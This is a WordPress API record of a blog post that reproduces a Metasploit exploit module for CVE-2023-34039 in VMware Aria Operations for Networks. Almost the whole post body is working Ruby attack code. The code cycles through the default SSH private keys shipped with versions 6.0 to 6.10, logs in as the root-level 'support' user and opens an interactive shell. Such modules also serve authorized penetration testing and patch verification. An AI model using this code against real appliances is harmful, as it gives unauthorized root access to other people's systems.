{"id":50526,"date":"2023-10-25T15:18:12","date_gmt":"2023-10-25T12:18:12","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/175320\/vmware_vrni_known_privkey.rb.txt"},"modified":"2023-11-28T08:57:05","modified_gmt":"2023-11-28T05:27:05","slug":"vmware-aria-operations-for-networks-ssh-private-key-exposure","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/vmware-aria-operations-for-networks-ssh-private-key-exposure\/","title":{"rendered":"VMWare Aria Operations For Networks SSH Private Key Exposure"},"content":{"rendered":"<p style=\"text-align: left;\">##<br \/>\n# This module requires Metasploit: https:\/\/metasploit.com\/download<br \/>\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework<br \/>\n##<\/p>\n<p style=\"text-align: left;\">require &#8216;net\/ssh&#8217;<br \/>\nrequire &#8216;net\/ssh\/command_stream&#8217;<\/p>\n<p style=\"text-align: left;\">class MetasploitModule &lt; Msf::Exploit::Remote<br \/>\ninclude Msf::Auxiliary::Report<br \/>\ninclude Msf::Exploit::Remote::SSH<\/p>\n<p style=\"text-align: left;\">Rank = ExcellentRanking<\/p>\n<p style=\"text-align: left;\">def initialize(info = {})<br \/>\nsuper(<br \/>\nupdate_info(<br \/>\ninfo,<br \/>\n{<br \/>\n&#8216;Name&#8217; =&gt; &#8216;VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure&#8217;,<br \/>\n&#8216;Description&#8217; =&gt; %q{<br \/>\nVMWare Aria Operations for Networks (vRealize Network Insight) versions 6.0.0 through 6.10.0<br \/>\ndo not randomize the SSH keys on virtual machine initialization. 
Since the key is easily<br \/>\nretrievable, an attacker can use it to gain unauthorized remote access as the &#8220;support&#8221; (root) user.<br \/>\n},<br \/>\n&#8216;Platform&#8217; =&gt; &#8216;unix&#8217;,<br \/>\n&#8216;Arch&#8217; =&gt; ARCH_CMD,<br \/>\n&#8216;Privileged&#8217; =&gt; true,<br \/>\n&#8216;Targets&#8217; =&gt; [<br \/>\n[ &#8216;6.0_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.0.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.0_proxy&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.0.0_proxy&#8217;) } ],<br \/>\n[ &#8216;6.1_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.1.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.1_proxy&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.1.0_proxy&#8217;) } ],<br \/>\n[ &#8216;6.2_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.2.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.2_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.2.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.3_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.3.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.3_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, 
&#8216;id_rsa_vnera_keypair_6.3.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.4_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.4.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.4_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.4.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.5_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.5.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.5_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.5.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.6_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.6.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.6_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.6.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.7_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.7.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.7_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.7.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.8_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.8.0_collector&#8217;) } ],<br 
\/>\n[ &#8216;6.8_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.8.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.9_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.9.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.9_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.9.0_platform&#8217;) } ],<br \/>\n[ &#8216;6.10_collector&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.10.0_collector&#8217;) } ],<br \/>\n[ &#8216;6.10_platform&#8217;, { &#8216;key&#8217; =&gt; ::File.join(Msf::Config.data_directory, &#8216;exploits&#8217;, &#8216;CVE-2023-34039&#8217;, &#8216;id_rsa_vnera_keypair_6.10.0_platform&#8217;) } ],<br \/>\n[<br \/>\n&#8216;All&#8217;, {} # built later<br \/>\n],<br \/>\n],<br \/>\n&#8216;Payload&#8217; =&gt; {<br \/>\n&#8216;Compat&#8217; =&gt; {<br \/>\n&#8216;PayloadType&#8217; =&gt; &#8216;cmd_interact&#8217;,<br \/>\n&#8216;ConnectionType&#8217; =&gt; &#8216;find&#8217;<br \/>\n}<br \/>\n},<br \/>\n&#8216;Author&#8217; =&gt; [<br \/>\n&#8216;h00die&#8217;, # MSF module<br \/>\n&#8216;SinSinology&#8217;, # PoC<br \/>\n&#8216;Harsh Jaiswal (@rootxharsh)&#8217;, # Discovery<br \/>\n&#8216;Rahul Maini (@iamnoooob)&#8217; # Discovery<br \/>\n],<br \/>\n&#8216;License&#8217; =&gt; MSF_LICENSE,<br \/>\n&#8216;References&#8217; =&gt; [<br \/>\n[&#8216;CVE&#8217;, &#8216;2023-34039&#8217;],<br \/>\n[&#8216;URL&#8217;, &#8216;https:\/\/github.com\/sinsinology\/CVE-2023-34039&#8217;],<br \/>\n[&#8216;URL&#8217;, 
&#8216;https:\/\/summoning.team\/blog\/vmware-vrealize-network-insight-rce-cve-2023-34039\/&#8217;],<br \/>\n[&#8216;URL&#8217;, &#8216;https:\/\/www.vmware.com\/security\/advisories\/VMSA-2023-0018.html&#8217;],<br \/>\n],<br \/>\n&#8216;DisclosureDate&#8217; =&gt; &#8216;2023-08-29&#8217;,<br \/>\n&#8216;DefaultOptions&#8217; =&gt; { &#8216;PAYLOAD&#8217; =&gt; &#8216;cmd\/unix\/interact&#8217; },<br \/>\n&#8216;DefaultTarget&#8217; =&gt; 22,<br \/>\n&#8216;Notes&#8217; =&gt; {<br \/>\n&#8216;Stability&#8217; =&gt; [CRASH_SAFE],<br \/>\n&#8216;Reliability&#8217; =&gt; [REPEATABLE_SESSION],<br \/>\n&#8216;SideEffects&#8217; =&gt; [IOC_IN_LOGS]\n}<br \/>\n}<br \/>\n)<br \/>\n)<\/p>\n<p style=\"text-align: left;\">register_options(<br \/>\n[<br \/>\n# Since we don&#8217;t include Tcp, we have to register this manually<br \/>\nOpt::RHOST(),<br \/>\nOpt::RPORT(22)<br \/>\n], self.class<br \/>\n)<\/p>\n<p style=\"text-align: left;\">register_advanced_options(<br \/>\n[<br \/>\nOptBool.new(&#8216;SSH_DEBUG&#8217;, [ false, &#8216;Enable SSH debugging output (Extreme verbosity!)&#8217;, false]),<br \/>\nOptBool.new(&#8216;STOP_ON_SUCCESS&#8217;, [ false, &#8216;Stop on successful login&#8217;, true]),<br \/>\nOptInt.new(&#8216;SSH_TIMEOUT&#8217;, [ false, &#8216;Specify the maximum time in seconds to negotiate a SSH session&#8217;, 30])<br \/>\n]\n)<br \/>\nend<\/p>\n<p style=\"text-align: left;\"># helper methods that normally come from Tcp<br \/>\ndef rhost<br \/>\ndatastore[&#8216;RHOST&#8217;]\nend<\/p>\n<p style=\"text-align: left;\">def rport<br \/>\ndatastore[&#8216;RPORT&#8217;]\nend<\/p>\n<p style=\"text-align: left;\">def do_login(user, key_data)<br \/>\nopt_hash = ssh_client_defaults.merge({<br \/>\nauth_methods: [&#8216;publickey&#8217;],<br \/>\nport: rport,<br \/>\nkey_data: [ key_data ]\n})<br \/>\nopt_hash.merge!(verbose: :debug) if datastore[&#8216;SSH_DEBUG&#8217;]\nbegin<br \/>\nssh_socket = nil<br 
\/>\n::Timeout.timeout(datastore[&#8216;SSH_TIMEOUT&#8217;]) do<br \/>\nssh_socket = Net::SSH.start(rhost, user, opt_hash)<br \/>\nend<br \/>\nrescue Rex::ConnectionError<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Unable to connect&#8221;<br \/>\nreturn nil<br \/>\nrescue Net::SSH::Disconnect, ::EOFError<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Disconnected during negotiation&#8221;<br \/>\nreturn nil<br \/>\nrescue ::Timeout::Error<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Timed out during negotiation&#8221;<br \/>\nreturn nil<br \/>\nrescue Net::SSH::AuthenticationFailed<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH &#8211; Failed authentication&#8221;<br \/>\nreturn nil<br \/>\nrescue Net::SSH::Exception =&gt; e<br \/>\nprint_error &#8220;#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}&#8221;<br \/>\nreturn nil<br \/>\nend<\/p>\n<p style=\"text-align: left;\">if ssh_socket<br \/>\n# Wrap the SSH connection in a command stream for the session; the connection is not closed here, only the local reference is cleared.<br \/>\nconn = Net::SSH::CommandStream.new(ssh_socket)<br \/>\nssh_socket = nil<\/p>\n<p style=\"text-align: left;\">return conn<br \/>\nend<br \/>\nnil<br \/>\nend<\/p>\n<p style=\"text-align: left;\">def exploit<br \/>\nif target.name == &#8216;All&#8217;<br \/>\nkeys = targets.filter_map { |t| t.opts[&#8216;key&#8217;] if t.name != &#8216;All&#8217; }<br \/>\nelse<br \/>\nkeys = [target.opts[&#8216;key&#8217;]]\nend<\/p>\n<p style=\"text-align: left;\">keys.each do |key|<br \/>\nvprint_status(&#8220;Attempting key: #{key}&#8221;)<br \/>\nkey_data = File.read(key, mode: &#8216;rb&#8217;)<br \/>\nconn = do_login(&#8216;support&#8217;, key_data)<br \/>\nnext unless conn<\/p>\n<p style=\"text-align: left;\">print_good &#8220;#{rhost}:#{rport} &#8211; Successful login via support@#{rhost}:#{rport} and ssh key: #{key}&#8221;<br \/>\nhandler(conn.lsock)<br \/>\nbreak if datastore[&#8216;STOP_ON_SUCCESS&#8217;]\nend<br \/>\nend<br 
\/>\nend<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## require &#8216;net\/ssh&#8217; require &#8216;net\/ssh\/command_stream&#8217; class MetasploitModule &lt; Msf::Exploit::Remote include Msf::Auxiliary::Report include Msf::Exploit::Remote::SSH Rank = ExcellentRanking def initialize(info = {}) super( update_info( info, { &#8216;Name&#8217; =&gt; &#8216;VMWare Aria Operations for Networks (vRealize Network Insight) SSH Private Key Exposure&#8217;, &#8216;Description&#8217; =&gt; %q{ VMWare Aria Operations &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-50526","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50526","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=50526"}],"version-history":[{"count":2,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50526\/revisions"}],"predecessor-version":[{"id":51294,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/50526\/revisions\/51294"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=50526"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=50526"},{"taxonomy":"post_tag
","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=50526"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}